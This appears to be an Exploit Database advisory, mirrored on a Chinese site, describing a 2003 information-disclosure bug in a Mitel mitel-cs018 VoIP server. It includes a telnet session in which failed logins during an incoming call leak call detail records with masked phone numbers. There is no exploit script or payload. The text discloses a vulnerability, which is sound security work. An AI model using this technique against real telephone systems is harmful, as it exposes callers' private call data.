Mitel mitel-cs018 – Call Data Information Disclosure

• Exploit Database
• 107 阅读

• 作者： Andrea Intilangelo
  日期： 2020-12-02
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/49176/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  # Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure # Date: 2003-07-28 # Exploit Author: Andrea Intilangelo (acme olografix / paranoici) # Vendor Homepage: www.mitel.com # Version: mitel-cs018 # Tested on: Windows, Linux   There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:   Trying 192.168.1.2... Connected to 192.168.1.2. Escape character is '^]'. Username: mitel-cs018 Password: ERROR: Invalid Username/Password pair Username: Password: Username: ^X^W^E^Q^W Password: ERROR: Invalid Username/Password pair Username: Password: ERROR: Invalid Username/Password pair # in this moment a foreign call arrive from outside Username: 155 OGIN 14911:11:55D 2 156 ICIN11:12: 6D 4 0xxxXxxxxx 157 XFIC 15611:12: 6 1510: 9:47 D 3 158 ICIN11:12: 6D 3 0xxxXxxxxx 159 ANSW 14611:12:110: 0: 9 D 4 160 HDIN 14611:12:21D 4 162 HREC 14611:12:270: 0: 6 D 4 163 ABND ?11:12:370: 0:37 D 3 0xxxXxxxxx 164 ICIN11:12:43D 3 0xxxXxxxxx 165 EXIC 14611:12:540: 0:47 D 4 166 ANSW 14611:13: 00: 0:16 D 3 167 HDIN 14611:13: 6D 3 169 EXIC 14611:13:13156 0: 0:12 D 3 171 EXOG 14911:13:460: 1:59 D 2 0xxXxxxxx 172 XFIC 15611:16:53 1460: 3:40 D 3 # where "0xxXxxxxx" are telephone numbers A derives table results is: SEQ CODEEXT ACC TIME RX TX DURATION LNDIALLED DIGITS COST No. No. COD HH:MM:SSFROMTO HH:MM:SS No. ___ _____ ____ ____ ____________ ________________ _____________________